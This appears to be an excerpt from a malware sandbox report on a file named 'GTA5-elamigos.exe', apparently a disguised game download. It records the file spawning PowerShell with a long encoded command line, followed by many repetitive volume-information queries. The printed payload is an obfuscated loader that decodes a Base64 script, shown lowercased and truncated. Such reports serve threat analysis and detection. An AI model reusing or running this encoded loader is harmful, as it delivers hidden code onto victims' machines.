wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmay
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmay
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmay	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmay	Jump to behavior

Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Queries volume information: C:\WindowsTasks\Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Queries volume information: C:\WindowsTasks\Updates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Queries volume information: C:\WindowsTasks\Platform VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
